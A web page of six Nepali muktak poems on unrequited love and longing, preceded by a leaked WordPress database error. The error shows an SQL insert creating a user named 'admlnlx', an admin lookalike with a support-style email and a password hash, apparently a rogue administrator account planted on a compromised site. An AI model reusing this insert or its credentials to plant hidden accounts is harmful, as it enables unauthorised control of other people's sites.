WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxK74Hlbvn8zIr.FgJ8frSVaRSLAab1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 14:36:05', '', 'admlnlx', 'admlnlx')
मुक्तक–१
चित्र हेरेका हौ या चरित्र ? मरिहत्ते गर्छौ
न परिचित हौ न त मित्र, मरिहत्ते गर्छौ
यसरी प्रस्ताव बारम्बार इन्कार गर्दापनि
खास के देख्यौ र म भित्र ? मरिहत्ते गर्छौ ।।
मुक्तक–२
उनिउहरु फुल्ने उपाय छ भने
त्यसमा भवरा डुल्ने उपाय छ भने
यति कुरा मलाइ नि बताउ है साथी
निस्ठुरीलाई भुल्ने उपाय छ भने ।।
मुक्तक–३
गरिदेकी छु सुराकी तिम्रै मर्जी भो
के–के गर्छौ अब बाँकी तिम्रै मर्जी भो
चिठी पनि ठेगना पनि दिएको छ उस्ले
प्रापक बन्ने या हुलाकि तिम्रै मर्जी भो ।।
मुक्तक–४
हाँस्ने बोल्ने थियो चलन बन्द भएछ
जिन्दगीको रौनक झन्झन् बन्द भएछ
प्रेमको मसीले पाना–पाना भर्ने मन थियो
उफ् ! तिम्रो दिलमा आवेदन बन्द भएछ ।।
मुक्तक–५
चिठी अनि खाम हेरी चित्त बुझाउँछु
दिलभित्र छ नाम हेरी चित्त बुझाउँछु
नफर्कने गरी उ गएपछी जिन्दगीबाट
अस्ताएको घाम हेरी चित्त बुझाउँछु ।।
मुक्तक–६
भन्यौ चलेको चलन छ सोच्नुपर्थ्यो तिम्ले
आफैबाट नियम बन्छ सोच्नुपर्थ्यो तिम्ले
घन राखेर वचनमा प्रहार गर्नु अगाडि
मेरो जस्तै उसको मन छ सोच्नु पर्थ्यो तिम्ले ।।